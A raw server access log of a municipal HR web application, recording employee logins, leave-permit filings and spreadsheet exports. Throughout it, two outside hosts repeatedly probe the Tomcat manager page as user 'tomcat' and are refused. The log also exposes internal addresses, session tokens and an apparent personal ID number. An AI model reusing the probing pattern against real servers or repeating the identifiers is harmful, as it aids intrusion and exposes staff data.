190.171.141.106 - - [18/Apr/2024:17:38:25 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376135d34d5c193e1f967154d0c41c6f75f437cc510b34b61e077ba1b290d7505dd093dd1464eb00bc054f56eab4f233eebeb4ecabef202aa62a308810d3423663bd3492b628d7a991c939dc0ebe93ac2f1c5e9c2f65a2e5dbc5570621419e443b7093dd1464eb00bc054f56eab4f233eebeb4ecabef202aa62a308810d3423663bd3492b628d7a991c939dc0ebe93ac2f1c5c54ee61d7f11c996d2c7d6a18667b0bcd91e24067a2bf0bf1a13950e3fc79d,gx-no-cache=1713472488299 HTTP/1.1" 200 79
190.171.142.10 - - [18/Apr/2024:17:38:26 -0300] "GET /cormun/servlet/trcontratoobservaciondir? HTTP/1.1" 200 6997
190.171.142.10 - - [18/Apr/2024:17:38:27 -0300] "GET /cormun/static/gxcfg.js?20221129848537 HTTP/1.1" 200 953
190.171.142.10 - - [18/Apr/2024:17:38:27 -0300] "GET /cormun/static/trcontratoobservaciondir.js?20221129848696 HTTP/1.1" 200 27185
190.171.142.10 - - [18/Apr/2024:17:38:28 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,PJARA,true HTTP/1.1" 200 35
218.38.210.48 - tomcat [18/Apr/2024:17:38:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.142.10 - - [18/Apr/2024:17:38:47 -0300] "GET /cormun/servlet/trcontratosolicitud? HTTP/1.1" 200 14403
190.171.142.10 - - [18/Apr/2024:17:38:47 -0300] "GET /cormun/static/gxcfg.js?202211298514361 HTTP/1.1" 200 953
190.171.142.10 - - [18/Apr/2024:17:38:47 -0300] "GET /cormun/static/trcontratosolicitud.js?202211298514531 HTTP/1.1" 200 28237
190.171.142.10 - - [18/Apr/2024:17:38:47 -0300] "GET /cormun//static/Resources/PXToolsGridNew.png HTTP/1.1" 200 427
190.171.142.10 - - [18/Apr/2024:17:38:48 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,PJARA,true HTTP/1.1" 200 35
190.171.141.106 - - [18/Apr/2024:17:39:32 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3767859bbeb6ab704b3acc1aedd6d06663f6b3991523bd2c6e836c4c146d3bebba6f899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713472554710 HTTP/1.1" 200 47
190.171.142.10 - - [18/Apr/2024:17:39:59 -0300] "GET /cormun/servlet/trpermisosingoce? HTTP/1.1" 200 7103
190.171.141.106 - - [18/Apr/2024:17:40:06 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:40:12 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 7105
190.171.141.106 - - [18/Apr/2024:17:40:13 -0300] "GET /cormun/static/gxcfg.js?2020121645532 HTTP/1.1" 200 953
190.171.141.106 - - [18/Apr/2024:17:40:13 -0300] "GET /cormun/static/trautorizarpermisogoce.js?2020121651492 HTTP/1.1" 200 34948
218.38.210.48 - tomcat [18/Apr/2024:17:40:42 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:41:06 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.141.106 - - [18/Apr/2024:17:41:12 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713472654947 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:41:12 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 963
190.171.141.106 - - [18/Apr/2024:17:41:12 -0300] "GET /cormun/servlet/trautorizarpermisogoce HTTP/1.1" 200 7106
190.171.141.106 - - [18/Apr/2024:17:41:27 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
190.171.141.106 - - [18/Apr/2024:17:41:37 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
190.171.142.10 - - [18/Apr/2024:17:41:54 -0300] "GET /cormun/servlet/trfichaempleado? HTTP/1.1" 200 13360
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376273d39cbc82fe4c815527b37b27955822b2fd6f1eb440aa042d3659d2d394188c2422423fda611c72fd547eb7f371827,gx-no-cache=1713472704548 HTTP/1.1" 200 200
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376683d8ff913582914c85e08e6f808fc64ff56436a63d02576621211bbdc756cb1,gx-no-cache=1713472704748 HTTP/1.1" 200 129
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:17:42:02 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713472704836 HTTP/1.1" 200 4807
190.171.141.106 - - [18/Apr/2024:17:42:11 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:42:21 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472723868 HTTP/1.1" 200 104
190.171.141.106 - - [18/Apr/2024:17:42:21 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472724022 HTTP/1.1" 200 4471
190.171.141.106 - - [18/Apr/2024:17:42:21 -0300] "GET /cormun/PermisosGoce-8715.xls HTTP/1.1" 200 4096
190.171.141.106 - - [18/Apr/2024:17:42:21 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472724175 HTTP/1.1" 200 104
190.171.141.106 - - [18/Apr/2024:17:42:21 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472724335 HTTP/1.1" 200 4471
190.171.141.106 - - [18/Apr/2024:17:42:22 -0300] "GET /cormun/PermisosGoce-7829.xls HTTP/1.1" 200 4096
190.171.141.106 - - [18/Apr/2024:17:42:27 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
190.171.141.106 - - [18/Apr/2024:17:42:30 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713472732947 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:17:42:30 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.141.106 - - [18/Apr/2024:17:42:30 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7231
190.171.141.106 - - [18/Apr/2024:17:42:35 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7167
190.171.141.106 - - [18/Apr/2024:17:42:43 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
218.38.210.48 - tomcat [18/Apr/2024:17:42:45 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:42:49 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713472751938 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:42:49 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 965
190.171.141.106 - - [18/Apr/2024:17:42:49 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7169
190.171.141.106 - - [18/Apr/2024:17:43:01 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:44:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472850990 HTTP/1.1" 200 4494
190.171.141.106 - - [18/Apr/2024:17:44:30 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472852939 HTTP/1.1" 200 4493
190.171.141.106 - - [18/Apr/2024:17:44:31 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472854459 HTTP/1.1" 200 4494
218.38.210.48 - tomcat [18/Apr/2024:17:44:46 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.142.10 - - [18/Apr/2024:17:44:47 -0300] "GET /cormun/servlet/trfichaempleado? HTTP/1.1" 200 13379
190.171.141.106 - - [18/Apr/2024:17:44:47 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472870411 HTTP/1.1" 200 4497
190.171.141.106 - - [18/Apr/2024:17:44:49 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472871898 HTTP/1.1" 200 4498
190.171.141.106 - - [18/Apr/2024:17:44:49 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472872170 HTTP/1.1" 200 4498
190.171.141.106 - - [18/Apr/2024:17:44:58 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472881539 HTTP/1.1" 200 4494
190.171.141.106 - - [18/Apr/2024:17:45:00 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472882538 HTTP/1.1" 200 4494
190.171.141.106 - - [18/Apr/2024:17:45:00 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472882778 HTTP/1.1" 200 4495
190.171.141.106 - - [18/Apr/2024:17:45:06 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,,gx-no-cache=1713472889259 HTTP/1.1" 200 4492
190.171.141.106 - - [18/Apr/2024:17:45:13 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
190.95.15.15 - - [18/Apr/2024:17:45:44 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 6054
190.95.15.15 - - [18/Apr/2024:17:45:47 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1739
190.95.15.15 - - [18/Apr/2024:17:45:59 -0300] "POST /cormun/servlet/hlogin?7941961ffb049e6a72d3117c56578227,gx-no-cache=1713472943280 HTTP/1.1" 200 448
209.141.55.133 - tomcat [18/Apr/2024:17:46:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.95.15.15 - - [18/Apr/2024:17:46:13 -0300] "POST /cormun/servlet/hlogin?7941961ffb049e6a72d3117c56578227,gx-no-cache=1713472957264 HTTP/1.1" 200 90
190.95.15.15 - - [18/Apr/2024:17:46:13 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.95.15.15 - - [18/Apr/2024:17:46:14 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 12212
218.38.210.48 - tomcat [18/Apr/2024:17:46:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:47:42 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
218.38.210.48 - tomcat [18/Apr/2024:17:48:50 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.138 - - [18/Apr/2024:17:49:19 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 6036
190.171.141.138 - - [18/Apr/2024:17:49:19 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1742
190.171.141.138 - - [18/Apr/2024:17:49:22 -0300] "POST /cormun/servlet/hlogin?b0ab1f5a32f84fb9b4bb99608cef28d5,gx-no-cache=1713473144592 HTTP/1.1" 200 90
190.171.141.138 - - [18/Apr/2024:17:49:22 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 959
190.171.141.138 - - [18/Apr/2024:17:49:22 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13584
190.171.141.138 - - [18/Apr/2024:17:49:26 -0300] "GET /cormun/servlet/trpermisosadjuntos?17138729,20240418082709,P, HTTP/1.1" 200 6826
190.171.141.138 - - [18/Apr/2024:17:49:27 -0300] "GET /cormun/servlet/permisosadjuntos?INS,17138729,P,20240418082709,, HTTP/1.1" 200 6123
190.171.141.138 - - [18/Apr/2024:17:49:27 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.138 - - [18/Apr/2024:17:49:34 -0300] "POST /cormun/servlet/permisosadjuntos?b0ab1f5a32f84fb9b4bb99608cef28d5,INS,17138729,P,20240418082709,, HTTP/1.1" 200 116
190.171.141.138 - - [18/Apr/2024:17:49:34 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1041
190.171.141.138 - - [18/Apr/2024:17:49:34 -0300] "GET /cormun/servlet/trpermisosadjuntos?17138729,20240418082709,P, HTTP/1.1" 200 7314
190.171.141.138 - - [18/Apr/2024:17:49:38 -0300] "POST /cormun/servlet/trpermisosadjuntos?b0ab1f5a32f84fb9b4bb99608cef28d5,17138729,20240418082709,P,,gx-no-cache=1713473160474 HTTP/1.1" 200 90
190.171.141.138 - - [18/Apr/2024:17:49:38 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 986
190.171.141.138 - - [18/Apr/2024:17:49:38 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 13584
190.171.141.138 - - [18/Apr/2024:17:49:41 -0300] "POST /cormun/servlet/trpermisosgoce?b0ab1f5a32f84fb9b4bb99608cef28d5,gx-no-cache=1713473163139 HTTP/1.1" 200 10465
190.171.141.138 - - [18/Apr/2024:17:49:41 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.141.138 - - [18/Apr/2024:17:49:41 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.141.138 - - [18/Apr/2024:17:49:41 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.141.138 - - [18/Apr/2024:17:49:41 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.141.106 - - [18/Apr/2024:17:50:32 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473215004 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:50:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.141.106 - - [18/Apr/2024:17:50:32 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:50:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1721
190.171.141.106 - - [18/Apr/2024:17:50:45 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473227931 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:50:45 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.141.106 - - [18/Apr/2024:17:50:45 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 7229
218.38.210.48 - tomcat [18/Apr/2024:17:50:51 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:51:03 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
218.38.210.48 - tomcat [18/Apr/2024:17:52:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:17:54:54 -0300] "GET /manager/html HTTP/1.1" 403 3196
209.141.55.133 - tomcat [18/Apr/2024:17:54:58 -0300] "GET /manager/html HTTP/1.1" 403 3196
218.38.210.48 - tomcat [18/Apr/2024:17:56:56 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:58:17 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
190.171.141.106 - - [18/Apr/2024:17:58:48 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
190.171.141.106 - - [18/Apr/2024:17:58:55 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713473717864 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:17:58:55 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1010
190.171.141.106 - - [18/Apr/2024:17:58:55 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 7231
190.171.141.106 - - [18/Apr/2024:17:59:01 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 7228
218.38.210.48 - tomcat [18/Apr/2024:17:59:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:17:59:23 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1739
190.171.141.106 - - [18/Apr/2024:17:59:28 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473750659 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:59:28 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.141.106 - - [18/Apr/2024:17:59:28 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:59:33 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1738
190.171.141.106 - - [18/Apr/2024:17:59:36 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473759291 HTTP/1.1" 200 454
190.171.141.106 - - [18/Apr/2024:17:59:38 -0300] "POST /cormun/servlet/hlogin?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473761507 HTTP/1.1" 200 90
190.171.141.106 - - [18/Apr/2024:17:59:39 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.141.106 - - [18/Apr/2024:17:59:39 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 7229
190.171.141.106 - - [18/Apr/2024:17:59:50 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473773517 HTTP/1.1" 200 4498
190.171.141.106 - - [18/Apr/2024:17:59:51 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774196 HTTP/1.1" 200 4498
190.171.141.106 - - [18/Apr/2024:17:59:52 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774668 HTTP/1.1" 200 4499
190.171.141.106 - - [18/Apr/2024:17:59:52 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774804 HTTP/1.1" 200 4498
190.171.141.106 - - [18/Apr/2024:17:59:52 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937 HTTP/1.1" 200 4498
190.171.141.106 - - [18/Apr/2024:17:59:58 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7168
190.171.141.106 - - [18/Apr/2024:17:59:59 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713473781941 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:17:59:59 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:17:59:59 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 7235
190.171.141.106 - - [18/Apr/2024:18:00:08 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473791325 HTTP/1.1" 200 4500
190.171.141.106 - - [18/Apr/2024:18:00:09 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473791508 HTTP/1.1" 200 4500
190.171.141.106 - - [18/Apr/2024:18:00:10 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473792756 HTTP/1.1" 200 4500
190.171.141.106 - - [18/Apr/2024:18:00:14 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473797044 HTTP/1.1" 200 4503
190.171.141.106 - - [18/Apr/2024:18:00:14 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473797189 HTTP/1.1" 200 4503
190.171.141.106 - - [18/Apr/2024:18:00:15 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473797987 HTTP/1.1" 200 4503
190.171.141.106 - - [18/Apr/2024:18:00:25 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473807988 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:25 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473808163 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:26 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473808860 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:26 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473808998 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:27 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473810363 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473810520 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473810796 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473810977 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473811123 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473811388 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:28 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473811522 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:29 -0300] "POST /cormun/servlet/trpermisosgoce?3e6089e46dd702e63640b850458fb6c9,gx-no-cache=1713473774937,gx-no-cache=1713473811670 HTTP/1.1" 200 4477
190.171.141.106 - - [18/Apr/2024:18:00:30 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 10697
190.171.141.106 - - [18/Apr/2024:18:00:51 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7189
218.38.210.48 - tomcat [18/Apr/2024:18:00:59 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:01:21 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376135d34d5c193e1f967154d0c41c6f75f0dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713473863515 HTTP/1.1" 200 79
190.171.141.106 - - [18/Apr/2024:18:01:33 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a3767859bbeb6ab704b3acc1aedd6d06663f6b3991523bd2c6e836c4c146d3bebba6f899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713473875862 HTTP/1.1" 200 47
190.171.141.106 - - [18/Apr/2024:18:01:47 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713473889284 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:01:47 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:01:47 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 10961
190.171.141.106 - - [18/Apr/2024:18:02:51 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
218.38.210.48 - tomcat [18/Apr/2024:18:03:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:03:13 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376e3ba1215d0a49347593183c61c9d54400dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713473975483 HTTP/1.1" 200 76
190.171.141.106 - - [18/Apr/2024:18:03:35 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376cea7d031656a89fef23343ca12e974e54ab2121eed124e0d7a976fb9d128b731f899e12d97c96f9b6fd70cb1efa11936,gx-no-cache=1713473998317 HTTP/1.1" 200 47
209.141.55.133 - tomcat [18/Apr/2024:18:03:41 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:03:55 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474017525 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:03:55 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:03:55 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 11159
190.171.141.106 - - [18/Apr/2024:18:04:10 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7187
190.171.141.106 - - [18/Apr/2024:18:04:19 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474041829 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:04:19 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
190.171.141.106 - - [18/Apr/2024:18:04:19 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713473774937 HTTP/1.1" 200 11159
190.171.141.106 - - [18/Apr/2024:18:04:31 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7188
190.171.141.106 - - [18/Apr/2024:18:05:00 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376ae15729e71fbc69783ce08988087c49a0dca96aced8075aa5788c1bfb3c7e1a326c89737914ad80162e02df97a8724bd,gx-no-cache=1713474082418 HTTP/1.1" 200 86
218.38.210.48 - tomcat [18/Apr/2024:18:05:02 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.106 - - [18/Apr/2024:18:05:52 -0300] "GET /cormun/servlet/permisogoce?a9047d3b878c564a5c04c47d39c4a376f4ce91328f0bb884289d058e0c7cba1ce6b900d6305bc39521b8e419c718848559711be843d5e5b7cd5acf6e0c2f1359,gx-no-cache=1713474135207 HTTP/1.1" 200 46
190.171.141.106 - - [18/Apr/2024:18:05:59 -0300] "POST /cormun/servlet/permisogoce?3e6089e46dd702e63640b850458fb6c9,INS,0,,,,gx-no-cache=1713474141150 HTTP/1.1" 200 93
190.171.141.106 - - [18/Apr/2024:18:05:59 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1032
